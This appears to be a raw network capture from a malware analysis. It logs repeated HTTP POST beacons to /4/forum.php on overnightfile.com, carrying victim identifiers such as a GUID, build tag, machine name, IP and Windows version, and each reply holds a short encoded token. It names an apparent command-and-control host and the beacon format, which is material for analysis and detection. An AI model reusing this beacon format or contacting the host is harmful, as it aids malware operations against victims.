                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:55.411665916 CEST780INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHJQSARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:55.715173006 CEST781OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:55.803328037 CEST782INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNHSMARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:56.118315935 CEST782OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:56.206547976 CEST782INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTCXGARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:56.515702963 CEST783OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:56.603728056 CEST783INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZBYAARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:56.913007021 CEST784OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:57.003186941 CEST784INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVJQEARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:57.308516026 CEST784OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:57.396816969 CEST785INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZBYAARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:57.710084915 CEST785OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:57.800950050 CEST785INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:58.160001040 CEST786OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:58.248193026 CEST786INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBNMYARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:58.584129095 CEST786OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:58.674938917 CEST787INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:58 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMBYNARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:58.996056080 CEST787OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:59.084211111 CEST787INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:58 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZBYAARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:59.387290001 CEST788OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:59.475527048 CEST788INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:59 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 42 59 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cABYZARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:00.137196064 CEST789OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:00.234807014 CEST789INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:59 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFKPUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:01.166742086 CEST789OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:01.257086039 CEST790INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:00 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 59 42 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYYBBARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:01.638675928 CEST790OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:01.727490902 CEST790INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:01 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMVENARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:02.484544992 CEST791OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:02.584038019 CEST791INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:02.943934917 CEST791OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:03.041389942 CEST792INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZGTAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:03.368863106 CEST792OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:03.472527027 CEST793INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVFUEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:03.796293974 CEST793OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
